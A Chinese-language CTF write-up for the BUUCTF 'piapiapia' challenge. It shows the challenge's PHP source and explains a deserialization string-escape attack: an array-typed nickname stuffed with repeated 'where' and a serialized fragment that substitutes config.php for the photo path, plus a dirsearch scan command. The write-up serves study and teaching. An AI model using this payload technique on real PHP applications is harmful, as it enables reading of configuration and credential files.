发布于2021-06-07 20:41 阅读(595) 评论(0) 点赞(0) 收藏(4)
看到一个登录框,尝试了弱密码爆破,sql注入也想试一下,都没成功,看来需要注册账号,但是页面上没有注册账号的按钮,理论上来讲可以用后台扫描扫一下后天看看有没有其他的页面或者内容的,但是buuctf扫描太快会显示429,不过我们可以猜一下注册页面应该是register.php。打开一看果然有注册页面。
登录成功之后,修改个人信息,可以看到在这里有文件上传选项,想要尝试文件上传获取shell的方式没有成功。上传了一个正常信息之后,
扫描后台可以使用这个命令可以缓解429的情况,这条命令给扫描加了个延时,
dirsearch -u http://03ac7628-2235-4ec1-838d-9ad73597826d.node3.buuoj.cn/ -s 2 -i 200
扫描结果可以看到有备份的源码。
我们可以从config.php中找到flag。
- <?php
- $config['hostname'] = '127.0.0.1';
- $config['username'] = 'root';
- $config['password'] = '';
- $config['database'] = '';
- $flag = '';
- ?>
注册和登陆界面没有可以攻击的地方我们的重点还是放在update.php和profile.php上。。
下面时update.php的代码。
- <?php
- require_once('class.php');
- if($_SESSION['username'] == null) {
- die('Login First');
- }
- if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
-
- $username = $_SESSION['username'];
- if(!preg_match('/^\d{11}$/', $_POST['phone']))
- die('Invalid phone');
-
- if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
- die('Invalid email');
-
- if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
- die('Invalid nickname');
-
- $file = $_FILES['photo'];
- if($file['size'] < 5 or $file['size'] > 1000000)
- die('Photo size error');
-
- move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
- $profile['phone'] = $_POST['phone'];
- $profile['email'] = $_POST['email'];
- $profile['nickname'] = $_POST['nickname'];
- $profile['photo'] = 'upload/' . md5($file['name']);
-
- $user->update_profile($username, serialize($profile));
- echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
- }
- else {
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <title>UPDATE</title>
- <link href="static/bootstrap.min.css" rel="stylesheet">
- <script src="static/jquery.min.js"></script>
- <script src="static/bootstrap.min.js"></script>
- </head>
- <body>
- <div class="container" style="margin-top:100px">
- <form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;">
- <img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
- <h3>Please Update Your Profile</h3>
- <label>Phone:</label>
- <input type="text" name="phone" style="height:30px"class="span3"/>
- <label>Email:</label>
- <input type="text" name="email" style="height:30px"class="span3"/>
- <label>Nickname:</label>
- <input type="text" name="nickname" style="height:30px" class="span3">
- <label for="file">Photo:</label>
- <input type="file" name="photo" style="height:30px"class="span3"/>
- <button type="submit" class="btn btn-primary">UPDATE</button>
- </form>
- </div>
- </body>
- </html>
- <?php
- }
- ?>
看代码可以看到我们输入的内容被过滤了一层,其中对nickname的限制还有长度要<10,但是我们传入nickname的内容是一个数组,就可以绕过长度限制。
我们在php的代码看到序列化函数,这里可以尝试反序列化漏洞。
$user->update_profile($username, serialize($profile));
让我们看一下update_profile函数的具体内容。
- public function update_profile($username, $new_profile) {
- $username = parent::filter($username);
- $new_profile = parent::filter($new_profile);
-
- $where = "username = '$username'";
- return parent::update($this->table, 'profile', $new_profile, $where);
- }
我们看到最后会调用父类的update方法将内容写入数据库。filter函数就是通过正则表达式过滤用户输入,将非法值替换为hacker。
- public function filter($string) {
- $escape = array('\'', '\\\\');
- $escape = '/' . implode('|', $escape) . '/';
- $string = preg_replace($escape, '_', $string);
-
- $safe = array('select', 'insert', 'update', 'delete', 'where');
- $safe = '/' . implode('|', $safe) . '/i';
- return preg_replace($safe, 'hacker', $string);
- }
至此update.php就已经了解清楚了,下面是profile.php的代码。
- <?php
- require_once('class.php');
- if($_SESSION['username'] == null) {
- die('Login First');
- }
- $username = $_SESSION['username'];
- $profile=$user->show_profile($username);
- if($profile == null) {
- header('Location: update.php');
- }
- else {
- $profile = unserialize($profile);
- $phone = $profile['phone'];
- $email = $profile['email'];
- $nickname = $profile['nickname'];
- $photo = base64_encode(file_get_contents($profile['photo']));
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <title>Profile</title>
- <link href="static/bootstrap.min.css" rel="stylesheet">
- <script src="static/jquery.min.js"></script>
- <script src="static/bootstrap.min.js"></script>
- </head>
- <body>
- <div class="container" style="margin-top:100px">
- <img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
- <h3>Hi <?php echo $nickname;?></h3>
- <label>Phone: <?php echo $phone;?></label>
- <label>Email: <?php echo $email;?></label>
- </div>
- </body>
- </html>
- <?php
- }
- ?>
我们可以看到这里的代码,有反序列化以及文件读取。
flag在config.php中,而且有serialize、unserialize、filter、file_get_contents,这几个关键字组合在一起就是ctf中常见的反序列字符逃逸的常见套路。构造包含config.php的数据,利用字符串逃逸,在profile.php中读取出来。
详细步骤:
注册账户、登陆账户、随意提交一些资料抓包、修改nickname为nickname[],数组绕过长度检测、修改nickname中的内容。
抓包重放,修改nickname为nickname[]
nickname的值为
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
此时,config.php的内容就把photo的位置顶替了,此时访问profile.php,没有图片,查看图片的值base64解码可以获取到flag。
原文链接:https://blog.csdn.net/qq_25500649/article/details/117462503
作者:门路弄土了吗
链接:http://www.phpheidong.com/blog/article/89644/76452c28c6dfe0905347/
来源:php黑洞网
任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任
昵称:
评论内容:(最多支持255个字符)
---无人问津也好,技不如人也罢,你都要试着安静下来,去做自己该做的事,而不是让内心的烦躁、焦虑,坏掉你本来就不多的热情和定力
Copyright © 2018-2021 php黑洞网 All Rights Reserved 版权所有,并保留所有权利。 京ICP备18063182号-4
投诉与举报,广告合作请联系vgs_info@163.com或QQ3083709327
免责声明:网站文章均由用户上传,仅供读者学习交流使用,禁止用做商业用途。若文章涉及色情,反动,侵权等违法信息,请向我们举报,一经核实我们会立即删除!